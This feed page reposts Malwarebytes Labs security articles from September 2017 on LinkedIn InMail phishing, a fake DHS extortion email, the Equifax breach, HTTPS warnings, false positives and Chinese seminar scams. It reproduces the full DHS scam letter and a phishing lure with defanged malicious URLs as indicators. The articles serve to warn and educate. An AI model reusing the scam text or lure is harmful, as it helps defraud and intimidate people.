It was discovered in the Osterman report that more than 60 percent of attacks take organizations more than nine hours to remediate. This is because of the need to manually remove threats as well as re-image machines where necessary. Without the manual process, time to remediate, or downtime, is significantly reduced.

4. It enables expert staff to focus on critical issues.

Remediation or reactive methods often require valuable resources and create a crisis due to the complexity of each threat. The administrator who removes the threats needs to have a certain level of expertise—often requiring skills that only few have. In Frost & Sullivan’s 2015 Global Information Workforce Study, researchers predict that there will be a shortage of 1.5 million information security experts by 2020, so the pool of talent is only getting smaller.

The shortage of capable admins causes additional issues to threat removal because it isn’t always as easy as clicking one button to disinfection the entire network; it can take hours to days away from productivity. Time can be spent on more valuable projects when admins are given the ability to run periodic scans to proactively check for anomalies.

Why do I have to choose?

You don’t have to choose. Remediation alone might not muster against large-scale attacks, but it can provide great assistance if threats slip through the cracks. If you’re looking to add a layer of security to your existing tool belt, we recommend a strong remediation tool for post-incident cleanup and some peace of mind. On the other hand, proactive prevention stops an attack before an infection occurs, avoiding risk and reducing damage.

Remediation tools, like Malwarebytes Incident Response, can be deployed on top of existing traditional approaches to provide peace of mind for those “what if” instances if your existing security measures fail. Finding a product that delivers both, like Malwarebytes Endpoint Protection, ensures multiple attack vectors are covered from the start.

The post Remediation vs. prevention: How to place your bets appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Compromised LinkedIn accounts used to send phishing links via private message and InMail

Malwarebytes - Tue, 09/12/2017 - 17:24

Phishing continues to be a criminals’ favorite for harvesting user credentials with more or less sophisticated social engineering tricks. In this post, we take a look at a recent attack that uses existing LinkedIn user accounts to send phishing links to their contacts via private message but also to external members via email.

What makes this campaign interesting is the abuse of long standing and trusted accounts that were hacked, including Premium membership accounts that have the ability to contact other LinkedIn users (even if they aren’t a direct contact) via the InMail feature. The fraudulent message includes a reference to a shared document and a link that redirects to a phishing site for Gmail and other email providers which require potential victims to log in.

Those who proceed will have their username, password, and phone number stolen but won’t realize they were duped right away. Indeed, this phishing scam ends on a tricky note with a decoy document on wealth management from Wells Fargo.

Private message

This message was received from a trusted and existing contact, although the time stamp is showing 12:17 AM, which is perhaps one of the red flags to be noted. The message talks about a shared Google Doc and gives a link to it, via the URL shortener.

Figure 1: An instant message from a contact directing to a phishing scam

Behind the shortened URL redirection

URL shorteners are a well-known vehicle for spreading malware and phishing scams but they are also used for legitimate purposes, especially on social media where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both and a free hosting provider ( to redirect to the phishing page, itself hosted on a hacked website.

Figure 2: The redirection flow behind this phish

Phishing for email credentials

This particular page is built as a Gmail phish, but will also ask for Yahoo or AOL user names and passwords. The main page is followed by an additional request for a phone number or secondary email address and ultimately the user sees a decoy Wells Fargo document hosted on Google Docs.

Figure 3: The phishing template, harvesting credentials and showing decoy content


Attackers are also abusing LinkedIn’s trusted InMail feature to send the same phishing link. As per LinkedIn, “InMail messages are sent directly to another LinkedIn member you’re not connected to.” This is an interesting aspect since it opens up the scope of the attack not only to the compromised account’s own contacts but also to other users.

This email was sent via LinkedIn and had a custom ‘Security Footer‘. LinkedIn will send messages “that include a security footer message with your name and professional headline to help you distinguish authentic LinkedIn emails from “phishing” email messages“, although it does point it out that it is no guarantee that the email is legitimate. In other words, the delivery method is to be trusted, but the content may not. The same can be said for phishing pages that use HTTPS – which is the case here – making content delivery secure but the content itself fraudulent.

Figure 4: The phishing email received via LinkedIn that includes the ‘Security Footer’

However, there’s a caveat here. To use InMail, you need a Premium account which comes at a hefty monthly cost. There’s a good article by KnowBe4 detailing a phishing attack using LinkedIn’s own platform via InMail. The researchers showed how trivial it is to create a free account, start connecting with people, and finally upgrade to a Premium account in order to start sending scams via InMail. But the conclusion of their research is that this particular attack would not scale well due to limited InMail credits, making the operation way too expensive.

This limitation does not apply here though since the crooks are not creating (and paying for) their own accounts, but rather leveraging existing ones. Therefore, they have little to worry about burning free credits and tarnishing their victim’s reputation so long as it allows them to deliver their payload far and wide.

Personal security and its implications

We do not know how (malware, other phishing attacks, etc.) or how many LinkedIn accounts were compromised in this campaign. It’s also unclear whether the shortened URLs are unique per hacked account or not, although we think they might be. The user whose account was hacked had over 500 connections on LinkedIn and based on Hootsuite‘s stats, we know 256 people clicked on the phishing link.

Figure 5: A Premium member account with 500+ connections caught sending phishing link

This kind of attack via social media is not new – we have seen hacked Skype or Facebook accounts send spam – but it reminds us of how much more difficult it is to block malicious activity when it comes from long standing and trusted user accounts, not to mention work acquaintances or relatives. This also makes such attacks more credible to potential victims and can lead to a snowball effect when victims become purveyors of phishing links themselves.

If your LinkedIn account gets compromised, you should immediately review its settings to change your password and enable two-step verification (instructions here). Additionally, you can post a quick update on your timeline that lets your contacts know you were hacked and that any previous message you may have sent with links should be carefully vetted.

We’d like to thank @acfou for sharing a sample of this campaign with us.

Indicators of compromise

Phishing message:

I have just shared a document with you using GoogleDoc Drive, View shared document[]

Redirection and phishing page:

ow[.]ly/qmxf30eWLyN dgocs[.] dgocs[.] cakrabuanacsbali[.]com/wp-rxz/index.php

Decoy Google Docs Wells Fargo file:

The post Compromised LinkedIn accounts used to send phishing links via private message and InMail appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (September 4 – September 10)

Malwarebytes - Mon, 09/11/2017 - 19:53

Last week, we looked into expired domain names being used for malvertising, delved into dubious Facebook apps, and checked out Chinese seminar scams. We also explained the whys and wherefores of false positives, explained what Google is doing with HTTPs, warned you away from a fake DHS email, and outlined some early information about the Equifax breach.


Consumer News Business News

Stay safe!

Malwarebytes Lab Team



The post A week in security (September 4 – September 10) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake DHS email – “Give us $350 in the next 24 hours”

Malwarebytes - Fri, 09/08/2017 - 15:00

Who likes threats?

Nobody, as it turns out. That hasn’t stopped scammers from jumping on the menacing email train – next stop, your inbox.

Every now and then, we see the 419 “Hitman deployed to kill you” missive doing the rounds. On a similar threatening note, we have a fake DHS notification telling you to pay a $350 fee within 24 hours – or else.

The email reads as follows (we’ve put the meatiest threats in bolded text):


You are to contact the U.S. Department of Homeland Security (DHS) Washington, D.C to obtain your Clearance Certificate, find below their contact information:

Contact Person: Stevan Bunnell
General Counsel
U.S. Department of Homeland Security (DHS)
Washington DC Mailing Address U.S. Department of Homeland Security Washington, D.C. 20528.

Ensure you contact (DHS) with your Full Name, Address and phone number/cell number.
Contact the DHS via Email with the information above immediately, once you contact them I will get back to you or else I will have an agent come visit you at home for questioning.

Furthermore, be advised that according to the United State Law together with the Federal Bureau of Investigation rules and regulations, you are to obtain the document from the DHS. Also note that you are to take care of the cost of the Clearance Certificate, which will be issued in your name. Due to the content of the Clearance Certificate and how important and secured the document is, you as the beneficiary will send the DHS the sum of $350 Dollars only for the issuing of the Clearance Certificate. That is the lay down rules for the DHS to release such sensitive document; DHS will issue you the authentic and original copy of the Clearance Certificate with a seal on it for verification and approval.

You are hereby advised to Contact them through the email address above to make an inquiry concerning how you will send the official fee to them. Note that you are to observe this immediately, if you really want your funds to be credited to your personal bank account and to avoid any legal battle with the security operatives over this matter. We have already informed the DHS about the present situation go ahead and contact them immediately.
Your funds are under our custody and will not be released to you unless the required document is confirmed, after that the fund will be release to you immediately without any delay.

NOTE: We have asked for the above document to make available the most completed and up-to date records possible for no criminal justice purposes. The documents will clarify the intensity of this fund; exonerate it from money laundry, scam and terrorism.

WARNING: Failure to provide the above requirement in the next 24 hours, legal action will be taken immediately by arresting and detaining you as soon as international court of justice issues a warrant of arrest, if you are found guilty, you will be jailed as terrorism, drug trafficking and money laundering is a serious problem in our community today and the world at large. The F.B.I will not stop at any length in tracking down and prosecuting any criminal who indulges in this criminal act. Nobody is above the law and the law is not a respecter of anybody. We presume you are law abiding and would not want to have scuffles with the authority, in and outside of the United States.

We are charged with the responsibility of implementing legal norms and our authority is irrevocable so don’t dare dispute our instruction, just act as instructed. The person you know will not help you in this matter rather abide by this instruction.

Note: You are to contact DHS with your full names, phone number/cell number and full address via the email which I stated above immediately, for the processing of your Clearance Certificate within the next 48 hours.

Faithfully Yours
Thomas Dinapoli
Office of the New York State Comptroller

That’s quite the barrage of “pay up”, and could well scare some people into handing over whatever the scammers ask for (and we’d be surprised if they stop at the $350). Should you receive one of these emails, simply delete it and go on with your day – nobody is coming to collect money from you.


Christopher Boyd


The post Fake DHS email – “Give us $350 in the next 24 hours” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Equifax breach: What you need to know

Malwarebytes - Fri, 09/08/2017 - 07:02

On July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax’s overall security posture.

According to Equifax, online criminals maintained their presence from mid-May through July 2017 and had access to:

  • Names
  • Social Security numbers
  • Birth dates
  • Addresses
  • Driver’s license numbers (in some cases)
  • Credit card numbers (for approx. 209,000 U.S. consumers)

It also said that some personal information for certain UK and Canadian residents was part of this breach.

This is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.

Equifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. More information about this breach and how to apply for ID theft protection can be found by going to, a website Equifax has just set up.

The post Equifax breach: What you need to know appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Google reminds website owners to move to HTTPS before October deadline

Malwarebytes - Thu, 09/07/2017 - 15:36

With the release of Chrome v62 in less than 3 months, Google will begin marking non-HTTPS pages with text input fields—like contact forms and search bars—and all HTTP websites viewed in Incognito mode as “NOT SECURE” in the address bar. The company has started sending out warning emails to web owners in August as a follow-up to an announcement by Emily Schechter, Product Manager of Chrome Security Team, back in April.

Google began marking sites in Chrome v56, which was issued in January of this year. They targeted HTTP sites that collect user passwords and credit card details.

For owners to secure the information being shared among their visitors and their web server, they must start incorporating an SSL certificate. Failing to do this is risky for both parties: sites that allow the sending of information in clear text may also allow its exposure through the Internet.

Ms. Schechter also provided website owners with a handy guide on how to enable HTTPS on their servers. An additional guideline on how to avoid the “NOT SECURE” warning on Chrome is also available for web developers.

Looking at the way things are panning out, we can be confident that HTTPS will be the norm in no time. However, this doesn’t mean that all sites using SSL certificates can and should be trusted.

Google intended to separate phishing sites from legitimate ones with the marking of insecure sites, as Help Net Security noted in an article. Unfortunately, the introduction of new browser versions capable of flagging sites also promptly introduced more phishing sites using HTTPS. We’ve been seeing examples of this in the wild, as well, the latest of which was an Apple phishing campaign.

Discerning phishing pages from the real ones has become more challenging than ever. This is why it’s important for users to familiarize themselves with other signs that they might be on a phishing page apart from the lack of SSL certificates. Fortunately, users don’t have to look far from the address bar when they want to double-check that they’re on the right page before entering their credentials or banking details. Keep in mind the following when scrutinizing URLs and other elements around it:

  • Look for letters in the URL that may have been made to look like another letter or number, or there may be additional letters or numbers in the URL. For example, may appear as—Catch that? The double ‘v’ together makes it look like the letter ‘w.’ This is an example of typosquatting. Here’s another example:—the ‘l’ in “example” is actually the number one.
  • Look for an Extended Validation Certificate (EV SSL). You know that a trusted website has this when you see a company name beside the URL, as you can see from the below UK Paypal address. Not all sites with SSL have this, unfortunately, but some of the trusted brands online already use EV SSL, such as Bank of America, eBay, Apple, and Microsoft.

Lastly, be aware that phishers may use a free SSL certificate in their campaign to make it appear legitimate. They may also hijack sites that already have SSL in place, adding more to the veil of legitimacy they want to attain.

Other related posts:


The Malwarebytes Labs

The post Google reminds website owners to move to HTTPS before October deadline appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: False positives

Malwarebytes - Thu, 09/07/2017 - 15:00
What are false positives?

False positive, which is sometimes written as f/p, is an expression commonly used in cybersecurity to denote that a file or setting has been flagged as malicious when it’s not.

In statistics, false positives are called Type I errors, because they check for a particular condition and wrongly give an affirmative (positive) decision. The opposite of this is false negative, or Type II error, which checks for a particular condition is not true when, in fact, it is. In this blog post, we will focus on false positives in cybersecurity, but note that false negatives in this field are commonly referred to as “misses.” So “misses” are malicious files or malicious behavior that the scanner or protection software did not detect.

Possible causes of false positives

The most common causes of false positives are:

  • Heuristics: decisions are made on minimal bits of information
  • Behavioral analysis: decisions are made based on behavior, and the legitimate file shows behavior that is usually considered malicious
  • Machine learning: sometimes we see the effects of “garbage in, garbage out,” or more politely put, “training did not take certain situations into account.”

Let’s give some examples of these causes.

An example rule for a heuristic detection could be this: if this file claims to be from Microsoft, but it is not signed with the Microsoft certificate, then we assume the file has malicious intentions. A false positive could occur in the rare case that Microsoft forgot to sign the file.

One detection vector in spotting the behavior of ransomware is if a program starts deleting shadow copies. Some ransomware families do this to ensure the victim has no backups. But you can imagine a cleanup utility that deletes old shadow copies, which could possibly be flagged as displaying malicious activity, right?

Machine learning is done by feeding the system vast amounts of training data. Mistakes or ambiguities in the training data can lead to errors in the detections.

Designing detection rules for yet-unknown malicious files or behavior is always a balance of trying to cover as many of them as possible without triggering any false positives and, understandably, this can go wrong sometimes.

Fun facts

A much less common cause for false detections is deliberate false positives. The most well-known false positive is the EICAR test file, a computer file that was developed by the European Institute for Computer Antivirus Research to verify the response of antivirus programs without having to use real malware. Note that Malwarebytes for Windows does not detect the EICAR file and Malwarebytes for Mac only detects it under exceptional circumstances. This is by design.

But history has also brought us deliberate false positives as a way to test if an anti-malware software is using detections made by their competitors.


False positives are alarms for non-specific files or behavior that is flagged as malicious, while in fact there were no bad intentions present. They are caused by rules that try to catch as many malicious events as possible, which sometimes fail by picking up something legitimate.


Pieter Arntz

The post Explained: False positives appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Nigerian scams without the Nigerians

Malwarebytes - Wed, 09/06/2017 - 23:00

Users in English speaking countries are quite familiar with the Nigerian scam: an important guy in Nigeria needs your help getting his money out of the country and if you assist with some transaction fees, a chunk of his fortune could be yours. But what about non-English speaking countries? What forms the baseline level of internet crap? Today we’re going to look at the Chinese version – the seminar scam.

Step 1: the pitch

This is actually more common via SMS, presumably due to limited mobile spam tools. The subject line will reference upcoming training for generic business skills like project management, book keeping, or HR.

项目领导力总结—8月23-24日学吧 《项目领导力》

This particular message we received is advertising a “project leadership” seminar.

These pitches vary in topic, generally staying around vague business topics and are so common that almost any Chinese internet user is likely to see one eventually. The provided mobile number doesn’t show any results besides more spam and the QQ isn’t registered to any notable groups. Generally, the accounts associated with these emails are used exclusively for the scam.

Step 2: the form

Naturally, we want to attend said seminar, so we sent a response asking how to register. Within a day, the scammer responded:

He’s referencing a file that has a detailed agenda, as well as registration info. He also wants our Weixin, so that we can “maintain a long-term relationship.”

The attached, clean file includes a “registration form” requiring the following:



  • Company name, address, and bank with account number
  • Attendee’s name, phone number, and email addresses.

This is the point where generic business spam begins to edge closer to malicious. Scammers will take the target’s money, and PII as well for use in further scams. Should a user actually fill this out, they will be signed up for every spammer’s list in perpetuity.

Step 3: the payment

Just in case we were wondering about receipts, the form lets us know that we can pick up our tickets the day of the “training,” and then provides a bank account that we can wire money directly to.

Given that we didn’t pay the guy and we did not go to Shanghai to check out the “venue”, there’s still a possibility that this may be legit. That said:

  • We responded from a free Chinese webmail, offering no company affiliation. This did not faze the scammer.
  • There are estimates that up to 40% of Chinese private educational institutions (training centers, job skills, etc.) are unlicensed and/or fraudulent
  • The price of this training is 1800 yuan, which makes up a significant portion of the average Chinese monthly wage of 2300 yuan.

The odds are fairly good that there either isn’t any training, or the venue specified actually hosts a pyramid scheme that will train members on how to recruit new marks. Much like a Nigerian scam, this form of advance fee fraud is very common and familiar. Its familiarity is actually a plus, as anyone who responds to such an obvious pitch more or less preselects themselves as a vulnerable and easily manipulated target. And similar to the 419 scam’s exploitation of underdeveloped financial institutions in Nigeria, the seminar scam exploits a void in regulation in the Chinese adult education market. Seminar scams are a great reminder that regardless of the language or culture used, scammers will exploit the same weaknesses online, wherever they are.


So how do you defend yourself against seminar scams? First, don’t respond to the email and definitely don’t disclose any personal information. But also ask yourself, “Have I heard of this institution? Does it have a local reputation?” As well as “What reputable organization advertises in this way?” Probably not too many. Stay safe: be vigilant.

The post Nigerian scams without the Nigerians appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Facebook worries: I didn’t post that

Malwarebytes - Wed, 09/06/2017 - 15:00

It is my assumption that most Facebook users don’t look at their own profile often. With your own profile, I mean the timeline that shows up when you click your own name or avatar in the Facebook menu.

That’s because we think we know exactly what is posted there, so why bother to look at it? After all, isn’t that supposed to be all the stuff that we posted ourselves?

The feeling of disorientation you get when you find something you are sure you didn’t post will be even worse if you notice that supposed messages have been sent from your Facebook Messenger account that you know you never sent. All in all, there might be some discrepancies between what you did and what actually shows up and that’s what this blog post is all about.

How do posts end up on your timeline that you didn’t post?

There are three main reasons that might be of some concern:

  1. Someone or something else has access to your Facebook account
  2. A Facebook app has the authorization to post on your timeline
  3. An active script or browser extension can post on your behalf

In all these cases, there is no immediate reason to worry as long as you know about it and trust the person, app, script, or extension that has access or authorization.

Authorized apps

We have seen it the past and I bet there are still active apps being spread among Facebook users by pretending to be spectacular videos. You may remember the “Man found inside Shark” and similar sensational posts, which try to trick you into downloading malware or installing a malicious app.

To check whether an app has the ability to post on your timeline, click on Settings:

On the left-hand side, click on Apps and select any app that doesn’t look familiar or trustworthy. You can see whether they can post on your timeline by looking at their permissions. If they have the authorization to post on your timeline, it will look like this:

Delete apps you don’t trust or no longer use by clicking on the X that shows up when you hover over an app with your mouse pointer in the Apps menu.

Scripts posting on your behalf

It is possible there is an active script (or program) that uses your credentials when you have Facebook opened in your browser. The script does not need to log in, but simply makes use of the fact that you already did log in. It doesn’t matter whether you did that actively or whether you relied on a cookie set in an earlier session.

These scripts can be hiding in your browser cache or in the shortcut that you use to open Facebook. You can find localized and browser-specific help on clearing your cache on this Facebook Help page for several browsers. You can circumvent using your shortcuts if you suspect they have been altered by typing in your browsers address bar. Once you are sure the shortcuts have been altered, you can find methods on how to clean your browser shortcuts on our forums.

Browser extensions could be responsible for this similar behavior. They can be removed following these procedures:

  • Internet Explorer: Tools (gear icon) > Manage add-ons > Toolbars and Extensions > Select the one(s) you don’t trust one by one and click “Disable”
  • Firefox: Menu (horizontal stripes) > Add-ons > click on “Disable” behind the ones you don’t trust or don’t recall installing.
  • Chrome: Menu (3 dots) > More Tools > Extensions > Uncheck “Enabled” behind the ones you don’t trust or don’t recall installing.
  • Opera: click the Opera icon > Extensions > Extension Manager > click on Disable below the ones you don’t trust or don’t recall installing.
Stolen credentials

I’m posting about this as the last option for a reason as the advice that we will give you here does not only apply to the cases where you know that someone or something you didn’t authorize posted on your behalf. If you have experienced or suspected that something or someone has been posting without your knowledge, or one of the other options (scripts, rogue apps), we recommend that you change your password and enable 2FA, if you haven’t already. Even if you have no idea who might have been responsible, we recommend you lock them out before they abuse their access to your account even further. We also recommend doing this even if you found out which app or other method was used, and even if you successfully removed the culprit, keep in mind that the same app or script might have harvested your login credentials and sent them to the threat actors.


What to do when you find posts in your name on Facebook which you did not post:

  1. Try to find out if there is a suspicious or unsolicited Facebook app active on your list that has posting authorization.
  2. Clear the cache of the browser that you use to access Facebook and the shortcuts you use to open Facebook.
  3. Change your password and consider enabling 2FA.


Other articles that might interest you:


Pieter Arntz

The post Facebook worries: I didn’t post that appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds